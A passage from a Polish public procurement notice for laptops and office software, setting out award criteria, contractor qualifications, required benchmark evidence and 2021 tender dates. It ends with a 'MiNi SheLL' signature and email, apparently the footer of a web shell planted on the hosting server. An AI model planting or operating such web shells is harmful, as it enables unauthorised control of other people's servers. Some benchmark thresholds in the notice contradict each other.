budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie części 1 zamówienia:<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 (dwie) dostawy przenośnych komputerów wysokowydajnych o wartości co najmniej 25 000,00 zł brutto każda. Przez jedną dostawę rozumie się dostawę realizowaną w ramach jednej umowy.<br/><br/>W zakresie części 2 zamówienia:<br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 (dwie) dostawy przenośnych komputerów o wartości co najmniej 10 000,00 zł brutto każda. Przez jedną dostawę rozumie się dostawę realizowaną w ramach jednej umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu Zamawiający będzie żądał dostarczenia:<br/>a) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w pkt. 9.1. TOM I SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, w zakresie 1 i 2 części zamówienia, dot. zdolności technicznej lub zawodowej Zamawiający będzie żądał dostarczenia:<br/>a) wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> I. Zamawiający wymaga złożenia wraz z Ofertą przedmiotowych środków dowodowych. W celu potwierdzenia przez wykonawcę, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące przedmiotowe środki dowodowe:<br/>1. W zakresie 1 części zamówienia:<br/>a)	dokument potwierdzający uzyskanie przez zaoferowany procesor deklarowanej <br/>w Formularzu Oferta liczby pkt. w testach Pass Mark (min. 15.400,00 pkt według wyników opublikowanych na stronie http://www.cpubenchmark.net/cpu_list.php nie wcześniej niż 7 dni przed terminem składania ofert);<br/>b)	dokument potwierdzający uzyskanie przez zaoferowaną kartę graficzną deklarowaną w Formularzu Oferta liczby pkt. w testach Pass Mark Performance Test (min. 11.000,00 pkt według wyników opublikowanych na stronie www.videocardbenchmark.net nie wcześniej niż 7 dni przed terminem składania ofert);<br/>c)	w przypadku zaoferowania produktu równoważnego w zakresie systemu operacyjnego dokumentację oferowanego systemu operacyjnego z zaznaczonymi odpowiednimi fragmentami potwierdzającymi spełnianie przez zaoferowany system opisanych w pkt. 3 SWZ TOM III (Opis przedmiotu zamówienia) wymagań;<br/>d)	deklaracje producenta sprzętu (wysokowydajnego komputera przenośnego, stacji dokującej, klawiatury zewnętrznej oraz myszy optycznej) o zgodności z CE lub dokument równoważny, czyli inny dokument potwierdzający zgodność <br/>z Dyrektywą RoHS II,<br/><br/>2. W zakresie 2 części zamówienia:<br/>a)	dokument potwierdzający uzyskanie przez zaoferowany procesor deklarowanej <br/>w Formularzu Oferta liczby pkt. w testach Pass Mark (min. 10.500,00 pkt według wyników opublikowanych na stronie http://www.cpubenchmark.net/cpu_list.php nie wcześniej niż 7 dni przed terminem składania ofert);<br/>b)	w przypadku zaoferowania produktu równoważnego w zakresie systemu operacyjnego dokumentację oferowanego systemu operacyjnego z zaznaczonymi odpowiednimi fragmentami potwierdzającymi spełnianie przez zaoferowany system opisanych w pkt. 3 SWZ TOM III (Opis przedmiotu zamówienia) wymagań;<br/>c)	deklaracje producenta oferowanego sprzętu (komputera przenośnego, klawiatury zewnętrznej oraz myszy optycznej) o zgodności z CE lub dokument równoważny, czyli inny dokument potwierdzający zgodność z Dyrektywą RoHS II,<br/><br/>3. W zakresie 3 części zamówienia:<br/>a)	w przypadku zaoferowania produktu równoważnego w zakresie oprogramowania biurowego dokumentację oferowanego oprogramowania z zaznaczonymi odpowiednimi fragmentami potwierdzającymi spełnianie przez zaoferowane oprogramowanie opisanych w pkt. 7 SWZ TOM III (Opis przedmiotu zamówienia) wymagań.<br/><br/>II. Jeżeli Wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie Wykonawcę do ich złożenia lub uzupełnienia w wyznaczonym terminie. <br/><br/>III. Zamawiający informuje, że pomimo przewidzianego wezwania określonego w pkt II, nie wezwie do złożenia lub uzupełnienia przedmiotowych środków dowodowych, jeżeli pomimo złożenia <br/> przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/><br/>IV. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. W zakresie 1 części zamówienia:<br/>a)	dokument potwierdzający uzyskanie przez zaoferowany procesor deklarowanej <br/>w Formularzu Oferta liczby pkt. w testach Pass Mark (min. 15.500,00 pkt według wyników opublikowanych na stronie http://www.cpubenchmark.net/cpu_list.php nie wcześniej niż 7 dni przed terminem składania ofert);<br/>b)	dokument potwierdzający uzyskanie przez zaoferowaną kartę graficzną deklarowaną w Formularzu Oferta liczby pkt. w testach Pass Mark Performance Test (min. 11.000,00 pkt według wyników opublikowanych na stronie www.videocardbenchmark.net nie wcześniej niż 7 dni przed terminem składania ofert);<br/>c)	w przypadku zaoferowania produktu równoważnego w zakresie systemu operacyjnego dokumentację oferowanego systemu operacyjnego z zaznaczonymi odpowiednimi fragmentami potwierdzającymi spełnianie przez zaoferowany system opisanych w pkt. 3 SWZ TOM III (Opis przedmiotu zamówienia) wymagań;<br/>d)	deklaracje producenta sprzętu (wysokowydajnego komputera przenośnego oraz stacji dokującej) o zgodności z CE lub dokument równoważny, czyli inny dokument potwierdzający zgodność z Dyrektywą RoHS II,<br/>2. W zakresie 2 części zamówienia:<br/>a)	dokument potwierdzający uzyskanie przez zaoferowany procesor deklarowanej <br/>w Formularzu Oferta liczby pkt. w testach Pass Mark (min. 15.500,00 pkt według wyników opublikowanych na stronie http://www.cpubenchmark.net/cpu_list.php nie wcześniej niż 7 dni przed terminem składania ofert);<br/>b)	w przypadku zaoferowania produktu równoważnego w zakresie systemu operacyjnego dokumentację oferowanego systemu operacyjnego z zaznaczonymi odpowiednimi fragmentami potwierdzającymi spełnianie przez zaoferowany system opisanych w pkt. 3 SWZ TOM III (Opis przedmiotu zamówienia) wymagań;<br/>c)	deklaracje producenta oferowanego sprzętu (komputera przenośnego) <br/>o zgodności z CE lub dokument równoważny, czyli inny dokument potwierdzający zgodność z Dyrektywą RoHS II,<br/>3. W zakresie 3 części zamówienia:<br/>a)	w przypadku zaoferowania produktu równoważnego w zakresie oprogramowania biurowego dokumentację oferowanego oprogramowania z zaznaczonymi odpowiednimi fragmentami potwierdzającymi spełnianie przez zaoferowane oprogramowanie opisanych w pkt. 7 SWZ TOM III (Opis przedmiotu zamówienia) wymagań. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Potwierdzenie umocowania do działania w imieniu Wykonawcy:<br/>a) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania – odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa<br/>w lit a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów;<br/>c) jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy złożenia wraz<br/>z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnianie<br/>warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 8.2. TOM I SWZ.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa w pkt. 10.2 TOM I SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani<br/>na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe,<br/>o których mowa w pkt. 10.6 TOM I SWZ, przy czym:<br/>1) podmiotowe środki dowodowe, o których mowa w pkt 10.6. pkt. 2 lit. a) TOM I SWZ składa<br/>odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i<br/>na zasadach opisanych w pkt 8.2 TOM I SWZ.<br/>2) podmiotowe środki dowodowe, o których mowa w pkt 10.6. pkt. 1 lit. a) TOM I SWZ składa<br/>każdy z nich.<br/>5. W przypadku, gdy spełnienie warunku opisanego:<br/>1) w pkt. 8.2. TOM I SWZ wykazuje co najmniej jeden z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia;<br/>2) w pkt. 8.2. TOM I SWZ wykonawcy wykazują poprzez poleganie na zdolnościach tych<br/>z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności<br/>są wymagane.<br/>- wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6. Zamawiający nie określił odmiennych wymagań związanych z realizacją zamówienia w<br/>odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.cirf.gov.pl/ogloszenia/zamowienia-publiczne/powyzej- 30000-eur</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com